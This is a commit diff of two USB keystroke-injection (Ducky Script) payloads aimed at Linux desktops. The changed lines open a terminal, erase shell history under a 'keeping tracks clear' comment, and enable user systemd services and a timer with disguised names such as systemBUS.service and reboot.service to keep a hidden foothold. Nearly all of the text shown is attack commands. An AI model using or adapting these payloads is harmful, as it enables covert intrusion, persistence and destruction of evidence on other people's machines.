commit
cd3704042c
|
@ -13,7 +13,7 @@ REM [keeping tracks clear]
|
||||||
DELAY 500
|
DELAY 500
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 400
|
DELAY 400
|
||||||
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
STRING export HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
|
@ -75,14 +75,8 @@ DELAY 300
|
||||||
STRING systemctl --user enable --now systemBUS.service
|
STRING systemctl --user enable --now systemBUS.service
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 150
|
DELAY 150
|
||||||
STRING systemctl --user start --now systemBUS.service
|
|
||||||
ENTER
|
|
||||||
DELAY 150
|
|
||||||
STRING systemctl --user enable --now reboot.service
|
STRING systemctl --user enable --now reboot.service
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 150
|
|
||||||
STRING systemctl --user start --now reboot.service
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [autostarting service on terminal/shell launch]
|
REM [autostarting service on terminal/shell launch]
|
||||||
|
|
|
@ -13,7 +13,7 @@ REM [keeping tracks clear]
|
||||||
DELAY 500
|
DELAY 500
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 400
|
DELAY 400
|
||||||
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
STRING export HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
|
@ -67,8 +67,5 @@ DELAY 300
|
||||||
STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
|
STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 150
|
DELAY 150
|
||||||
STRING systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
|
|
||||||
ENTER
|
|
||||||
DELAY 150
|
|
||||||
STRING exit
|
STRING exit
|
||||||
ENTER
|
ENTER
|
||||||
|
|
Loading…
Reference in New Issue